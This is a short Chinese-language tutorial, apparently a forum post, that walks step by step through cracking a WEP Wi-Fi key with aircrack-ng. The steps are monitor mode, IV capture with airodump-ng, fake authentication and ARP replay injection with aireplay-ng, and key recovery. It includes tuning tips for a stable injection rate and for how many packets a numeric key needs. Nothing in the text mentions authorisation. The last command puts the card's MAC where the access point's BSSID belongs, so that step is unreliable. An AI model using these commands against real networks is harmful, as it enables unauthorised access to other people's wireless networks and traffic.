1、首先
ifconfig -a
查看自己的網卡,我的是eth1,也有的是WLAN
2、ifconfig -a eth1 up
驅動自己的網卡
3、airmon-ng start eth1 6
開啟自己網卡的監聽模式,頻道號為你要破解的AP的頻道號。查看的方法很多,我就不細說了。
4、airodump-ng –ivs -w result -c 6 eth1
開始抓包,–ivs代表只抓IVS包,此處是兩個“-”-w代表寫入文件,後面我寫的是result即抓到的包都保存在以result為文件名的文件中,-c代表頻道,這裡是6。
5、開另一shell窗口
偽裝連接 aireplay-ng -1 0 -e apID -a apmac -h 網卡mac eth1
成功後 aireplay-ng -3 -b -apmac -h 網卡mac -x 30 eth1
運行後會顯示
read **** packets(got 0 arp requests),sent 0 packets…
大家不要著急,這是沒有ARP包,耐心等待。不過我破的有的等到10W多還是沒用,建議換個時間試試。
-x 30這個是關鍵,-x是指定注入速度,這裡是30,一般資料都是 -x 1024,但實際上4311在BT3使用1024的注入速度,的確是可以的,能達到4、500,不過過不了1、2秒,就提示
write failed: Cannot allocate memory
wi_write(): Illegal seek
注入就停了。在論壇上看帖子有人說30就能穩定,經實驗的確如此。大家可以嘗試提高這個數值,看最大能到多少。畢竟30還是比較慢的,我室友看優酷都能到 70多,不用注入,一會兒就夠了。
6、等DATA到了15000左右
開另一shell窗口
aircrack-ng -n 64 -b 網卡mac result*.ivs
即可,如果沒出密碼,就是DATA不夠,繼續等幾W個,再次運行。我的經驗是10位純數字密碼3W內90%會出。